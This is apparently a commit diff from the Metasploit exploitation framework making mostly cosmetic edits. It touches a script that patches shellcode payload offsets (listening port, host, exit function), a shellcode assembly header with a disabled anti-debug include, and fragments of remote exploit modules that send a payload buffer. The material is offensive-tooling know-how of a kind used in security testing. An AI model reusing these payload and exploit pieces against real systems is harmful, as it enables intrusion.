Mostly cosmetic changes from local tree
git-svn-id: file:///home/svn/framework3/trunk@7970 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
2b6a1993aa
commit
d0969746a4
|
@ -60,8 +60,10 @@ def xmit( name, dump_ruby=True ):
|
|||
data = f.read()
|
||||
print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
|
||||
xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
|
||||
xmit_offset( data, "LEPort", pack( "<H", 4444 ) ) # 4444
|
||||
xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1
|
||||
xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) ) # Filler
|
||||
xmit_offset( data, "Hostname", "https" )
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
|
||||
|
@ -97,3 +99,4 @@ def main( argv=None ):
|
|||
if __name__ == "__main__":
|
||||
main()
|
||||
#=============================================================================#
|
||||
|
||||
|
|
|
@ -9,6 +9,9 @@
|
|||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
; Disabled until this is better tested
|
||||
; %include "./src/block/block_antidebug.asm"
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
delta: ;
|
||||
|
|
|
@ -68,3 +68,4 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -106,3 +106,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
targ = target
|
||||
|
||||
if (target['auto'])
|
||||
|
||||
print_status("Detecting the remote version...")
|
||||
resp = send_request_raw({'uri' => '/topology/home'}, 5)
|
||||
if resp.nil?
|
||||
print_status("No response to request")
|
||||
|
@ -167,7 +167,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'data' => payload_buf
|
||||
})
|
||||
|
||||
rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR
|
||||
# do nothing let the exploit live this catches the
|
||||
# connection reset by peer error which is expected
|
||||
|
|
Loading…
Reference in New Issue